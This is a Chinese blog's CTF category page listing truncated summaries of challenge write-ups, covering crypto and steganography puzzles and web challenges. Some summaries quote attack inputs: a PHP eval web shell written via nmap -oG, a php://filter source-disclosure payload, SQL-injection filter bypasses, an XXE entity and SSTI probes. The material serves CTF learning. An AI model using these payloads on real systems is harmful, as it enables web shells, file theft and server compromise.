随笔分类 - CTF
摘要:1.介绍 1.1nmap使用 2.步骤 2.1使用nmap命令输入一句话进行保存。 ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 2.2发现没有成功。使用phtml进行绕过 ' <?= @eval($_POST["pd"]);?> -oG pd.ph
阅读全文
摘要:1.介绍 1.1二次注入 1.2无列名注入 1.3Maria数据库特性 2.步骤 2.1在广告申请界面输入'引号,查看详情界面出现报错,发现存在报错。 2.2 经过尝试发现过滤了空格,or,and,--+,#,order等关键字 order by可以使用group by代替,空格可以使用/**/代替
阅读全文
摘要:1.介绍 1.1python脚本编写 1.2二进制转字符串 2.步骤 2.1解压缩包,在gif文件中发现黑白图片,编写python脚本,得到10二进制字符串。 2.2使用工具进行转码,得到flag。
阅读全文
摘要:1.介绍 1.1Java反编译 1.2Base64编码 2.步骤 2.1下载文件发现是Java应用使用jd-gui进行反编译,发现一个飞机大战程序,在PlaneGameFrame.class文件在找到flag, 2.2输入不对,根据特征判断困难是base64编码,再进行解密得到flag。
阅读全文
摘要:1.介绍 1.1pdf文件特点 1.2摩斯密码 2.步骤 2.1用浏览器打开pdf,全选复制pdf,粘贴在txt文件中,发现由A\B构成的一串字符 2.2使用工具进行摩斯解密,得到flag。
阅读全文
摘要:1.介绍 1.1图片隐写 1.2图片拼接 1.3二维码扫描 1.4Stegsolve的使用 2.步骤 2.1下载附件,查看gif图片,发现有二维码闪过,通过Stegsolve截取下来二维码, 2.2对比正常二维码,发现缺三个角,从网上找一个角,使用画板进行拼接, 2.3使用在线网站扫描得到flag。
阅读全文
摘要:1.介绍 1.1与佛论禅编码 1.2rot13 1.3base64 2.步骤 2.1下载文件打开,查看发现为与佛论禅编码 2.2解密得到类似,base64编码,尝试解密无果 2.3根据题目提示,可能需要rot13解密,rot编码。 2.4再次尝试base64解密,得到flag。 3.借鉴 攻防世界-
阅读全文
摘要:1.介绍 1.1pdf转换转化为word格式。 2.步骤 2.1下载pdf文件,提示图片下面什么都有, 将pdf转化为word,移开照片,得到flag。 3.借鉴 https://www.jianshu.com/p/ba004f745131
阅读全文
摘要:1.介绍 1.1ssti 1.2黑名单绕过 2.步骤 2.1查看源代码,使用了python的flask模板,开始代码审计。 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('
阅读全文
摘要:1.介绍 1.python代码审计 2.python的flask框架 2.步骤 2.1将代码整理,开始进行代码审计。 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request im
阅读全文
摘要:1.介绍 1.1题型rce远程命令漏洞 1.2代码审计 1.3PHP函数 1.4PHP正则匹配 2.步骤 2.1首先进行代码审计 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_sou
阅读全文
摘要:1.发现 1.1没发现提示,使用dirsearch扫描一下后台,扫到一个文件。 1.2打开文件,又是一个文件。 1.3打开文件,提示不是flag。 1.4使用bp抓一下包发现一个文件。 1.5打开文件,修改一下编码,得到PHP代码。 <?php header('Content-type:text/h
阅读全文
摘要:1.发现 1.1打开题目地址,发现PHP代码,进行代码审计。 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter =
阅读全文
摘要:1.发现 1.1打开题目地址,一步步按照正常提示购买。输入编号1,价格2 不行。 1.2一个一个输入发现,只有编号4提示,只能输入一个字符。 1.3查看源代码,提示utf-8编码很重要。 2.步骤 2.1再找一个大点的utf-8数。 2.2将0x替为%,输入payload,得到flag。 3.借鉴
阅读全文
摘要:1.发现 1.1打开题目地址,查看源代码,发现Hint页面的源代码有提示cookie。 1.2在flag页面尝试输入,发现返回输入内容。 1.3尝试{{7*7}},发现ssti漏洞,判断是twig。 2.步骤 2.1输入payload,发现不对,抓包,发现user为注入点。 2.2输入payload
阅读全文
摘要:1.发现 1.1打开题目地址,发现为登录框,尝试输入发现只会返回用户名错误。 1.2根据提示XML相对XXE攻击 2步骤 2.1首先进行抓包,然后构造payload。 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY a
阅读全文
摘要:1.发现 1.1打开题目地址随便试试,发现url有传参。 1.2随便传参发现没有反应,查看wp,发现需要伪协议传参 。 php://filter/read=convert.base64-encode/resource=index 1.3发现为base编码,解码后得到源码,对源代码进行分析。 2.步骤
阅读全文
摘要:1.发现 1.1使用dirsearch扫一下,发现存在.git泄露。 1.2使用Git Hack扒下flag.php,index.php,开始审计代码。 #flag.php将内容赋值给flag。 <?php include 'flag.php'; #包含flag.php文件 $yds = "dog"
阅读全文
摘要:1.发现 1.1打开题目地址发现网页一直在刷新,时间一直变。 1.2用burp抓包,发现传入了两个参数,并且前面是函数,后面是格式 猜测func来执行p。 2.步骤 2.1我们传入func=file_get_contents&p=index.php,得到源码。 <?php $disable_fun
阅读全文
摘要:1.发现 1.1打开下载文件,提示为变种凯撒密码。 1.2做以下尝试 afZ_ -> flagrc -> {} 其中ASCII码值的变化为 2.步骤 2.1写一个python脚本,得到flag。
阅读全文

浙公网安备 33010602011771号